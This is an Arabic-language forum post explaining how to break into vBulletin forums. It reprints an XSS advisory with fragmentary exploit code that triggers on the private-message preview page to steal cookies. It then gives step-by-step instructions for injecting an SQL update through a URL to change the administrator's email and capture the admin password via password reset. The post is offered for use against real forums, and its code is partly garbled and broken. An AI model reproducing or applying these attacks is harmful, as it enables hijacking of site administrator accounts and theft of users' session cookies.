الزعيم Admin
mms : وسام التميز : الاوسمة : عدد المساهمات : 1169 تاريخ التسجيل : 18/03/2010 العمر : 35 الموقع : www-aloamed.ace.st المزاج : ممتاز
لعبة عالمية مرئي للجميع: 1
| موضوع: أختراق منتديات الvp الخميس نوفمبر 11, 2010 8:29 am | |
| أرجوا عدم استخدام الثغرة على المسلمين وفيما يظر بالإسلام وفيما حرمه الله لكن هذي كانت على النسخة التجريبية Beta بالنسبة للثغرة فهي واضحة وهي تستغل عن طريق الرسائل private.php وتقوم بسرقة الكوكيز ولكن بشرط يكون مفعل كود الهتمل في المنتدى وصاحب الثغرة يذكر انه قد يكون من الضروري تسجيل الدخول لك طبعا استغلالها عن طريق تحويل الكود لملف html مع تغيير اسم الموقع ومجلد المنتدى [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
PHP:
------------------------------------------------------------------------------From: Ferruh Mavituna Subject: VBulletin Preview Message&nbs p;- XSS Vuln --------------------------------------- VBulletin Private Message&nbs p;"Preview Message" XSS Vulnerability --------------------------------------- Any kind of XSS att acks possibility. ----------------------------------------------------- About VBulletin; ----------------------------------------------------- PHP Based Popular Forum& nbsp;Application Vendor & Demo; [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
--------------------------------------- Vulnerable; -----------------------------------------------------
vBulletin 3.0.0 Beta 2
vBulletin 2.x --------------------------------------- Vendor Status; ----------------------------------------------------- I can not contact v endor for this issue ! No patch available at&nb sp;the moment; ----------------------------------------------------- Solution; ----------------------------------------------------- HTML Encoding like post& nbsp;thread preview page; ----------------------------------------------------- Exploit Code; -----------------------------------------------------
p;method="post" name="vbform">
tabindex="2" />
tabindex="3">
accesskey="s" tabindex="4" />
name="preview" onclick="this.form.dopreview = true; return true;this.form.submit()" tabindex="5" >
checked="checked" />
checked="checked" />
id="cb_disablesmilies" /> "; document.vbform.title.value=xss; document.vbform.preview.click(); //Set Values and Submit // You can write your own JS codes var xss = "">alert(document.coo kie)
*You may need login first Ferruh Mavituna Web Application Security Consultant Freelance Developer & Designer
target="_blank">[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
طريقة أخرى 1. قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي 2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك 3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members . أو العنوان التفصيلي التالي : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] URL = العنوان المستضيف للمنتدى مثل4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar . سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266 5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator . (((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == )) أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية 6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] rs=$DB_site->query('update+user+set+email='YOUR@EMAIL.HERE'+WH ERE+username='ADMIN'').' العنوان هذا ستقوم بتغيير الكلمات التالية URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى VALIDUSER = أسم المستخدم الخاص بك VALIDPASS = كلمة السر الخاصة بك [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] = البريد الذي سجلت به بالمنتدى ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة ) 7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات refresh . 8. ثم ترجع لصفحة المنتدى الرئيسية [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) . بالطيع ستظهر لك الصفحة التعيسة التي تقول : أنت قمت بكتابة كلمة سر خاطئة you typed in the wrong password 9. بكل بساطة أضغط على نسيت كلمة السر forgot password والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني 10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى ملاحظة هذه الطريقة قديمة وأغلب المنتديات قاموا بإغلاق هذه الثغرة يعني لا تستطيع فعلها إلا مع منتديات اليوم | |
|